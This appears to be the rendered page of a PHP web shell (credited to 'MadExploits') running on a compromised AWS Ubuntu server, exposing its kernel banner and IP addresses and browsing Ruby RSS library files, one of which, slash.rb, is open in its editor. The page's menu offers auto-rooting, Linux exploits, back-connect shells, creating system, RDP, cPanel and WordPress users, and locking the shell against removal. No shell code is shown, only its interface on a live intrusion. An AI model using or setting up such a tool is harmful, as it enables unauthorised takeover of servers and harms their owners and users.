Linux ip-172-26-2-223 5.4.0-1018-aws #18-Ubuntu SMP Wed Jun 24 01:15:00 UTC 2020 x86_64
Apache
: 172.26.2.223 | : 18.216.93.197
Cant Read [ /etc/named.conf ]
8.1.13
www
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
usr /
lib /
ruby /
2.7.0 /
rss /
maker /
[ HOME SHELL ]
Name
Size
Permission
Action
0.9.rb
11.8
KB
-rw-r--r--
1.0.rb
10.05
KB
-rw-r--r--
2.0.rb
5.72
KB
-rw-r--r--
atom.rb
4.54
KB
-rw-r--r--
base.rb
24.1
KB
-rw-r--r--
content.rb
421
B
-rw-r--r--
dublincore.rb
3.77
KB
-rw-r--r--
entry.rb
4.73
KB
-rw-r--r--
feed.rb
12.51
KB
-rw-r--r--
image.rb
2.9
KB
-rw-r--r--
itunes.rb
7.32
KB
-rw-r--r--
slash.rb
773
B
-rw-r--r--
syndication.rb
387
B
-rw-r--r--
taxonomy.rb
3.14
KB
-rw-r--r--
trackback.rb
1.6
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : slash.rb
# frozen_string_literal: false require_relative '../slash' require_relative '1.0' module RSS module Maker module SlashModel def self.append_features(klass) super ::RSS::SlashModel::ELEMENT_INFOS.each do |name, type| full_name = "#{RSS::SLASH_PREFIX}_#{name}" case type when :csv_integer klass.def_csv_element(full_name, :integer) else klass.def_other_element(full_name) end end klass.module_eval do alias_method(:slash_hit_parades, :slash_hit_parade) alias_method(:slash_hit_parades=, :slash_hit_parade=) end end end class ItemsBase class ItemBase include SlashModel end end end end
Close